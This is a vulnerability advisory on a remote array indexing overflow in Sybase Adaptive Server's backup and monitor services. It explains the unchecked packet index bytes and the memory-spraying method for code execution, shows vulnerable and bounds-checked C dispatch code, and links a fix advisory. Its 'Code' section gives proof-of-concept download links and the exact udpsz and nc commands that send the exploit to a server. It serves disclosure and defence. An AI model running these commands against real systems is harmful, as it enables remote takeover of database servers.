#######################################################################

Luigi Auriemma

Application:  Sybase Adaptive Server
              http://www.sybase.com/products/databasemanagement/adaptiveserverenterprise
Versions:     <= 15.5
Platforms:    Solaris, Windows, Linux, AIX, HP
Bug:          array indexing overflow in bcksrvr and monsrvr
Exploitation: remote, versus server
Date:         probably found 28 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

???

#######################################################################

======
2) Bug
======

The backup and monitor database servers listen by default on ports 5001 and 5002 and are important components of the Adaptive Server architecture.

The problem is an array indexing overflow caused by the two 8-bit values located at offsets 0x84 and 0x85 of the login packet: each is used, without any bounds check, as an index to fetch a function pointer from a table.
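As an added illustration, not code from the advisory or from Sybase, the following C snippet shows the bug class described above: an unchecked 8-bit index into a function pointer table, next to the bounds-checked form a fix would use. The handler names, the table contents and its size are assumptions; the real bcksrvr/monsrvr tables are not reproduced here.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed illustration of the bug class in this advisory: an 8-bit field
 * of the login packet is used directly as an index into a function pointer
 * table. Handler names, table contents and size are assumptions. */

typedef int (*handler_fn)(const uint8_t *pkt, size_t len);

static int handler_login(const uint8_t *pkt, size_t len) { (void)pkt; (void)len; return 1; }
static int handler_ping(const uint8_t *pkt, size_t len)  { (void)pkt; (void)len; return 2; }

/* Small dispatch table with NULL gaps, like the one dumped in section 2. */
static const handler_fn dispatch[] = { handler_login, NULL, handler_ping, NULL };
#define DISPATCH_LEN (sizeof dispatch / sizeof dispatch[0])

#define IDX_OFFSET 0x84   /* offset of the index byte in the login packet */

/* Vulnerable form: the index byte is used unchecked. A value >= DISPATCH_LEN
 * reads a "function pointer" from whatever memory follows the table, and a
 * NULL entry is called as well. This is the defect the advisory describes. */
int dispatch_unchecked(const uint8_t *pkt, size_t len)
{
    if (len <= IDX_OFFSET) return -1;
    uint8_t idx = pkt[IDX_OFFSET];
    return dispatch[idx](pkt, len);   /* out-of-bounds read of a code pointer */
}

/* Hardened form: an 8-bit index can be 0..255, so both the table bound and
 * the NULL gaps must be checked before the indirect call. */
int dispatch_checked(const uint8_t *pkt, size_t len)
{
    if (len <= IDX_OFFSET) return -1;            /* packet too short */
    uint8_t idx = pkt[IDX_OFFSET];
    if ((size_t)idx >= DISPATCH_LEN) return -2;  /* index past the table */
    if (dispatch[idx] == NULL) return -3;        /* unused slot */
    return dispatch[idx](pkt, len);
}

/* Builds a constructed login packet with the given index byte and runs the
 * checked dispatcher on it; returns the dispatcher's result. */
int run_with_index(uint8_t idx)
{
    uint8_t pkt[0x100];
    memset(pkt, 0, sizeof pkt);
    pkt[IDX_OFFSET] = idx;
    return dispatch_checked(pkt, sizeof pkt);
}
```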
The following is the functions table for the value at offset 0x84:

[function pointer table dump omitted]

While the following is the one for 0x85:

[function pointer table dump omitted]

Code execution is accomplished by spraying the attacker's own data in memory through the sending of various specific packets.
The secret is sending the "filler" packets to the main server (port 5000) so that the shared memory in the 0x20202020 zone gets immediately filled and monsrvr will have full access to it. When the attacker sends the malformed packet with the array index set to 0x44, monsrvr will execute his code.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/sybase_2.zip

  udpsz -X 0x600 8 l 0 -f sybase_2_filler.dat -T -l 1 SERVER 5000 -1

and then:

  nc SERVER 5002 < sybase_2.dat

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-246/

#######################################################################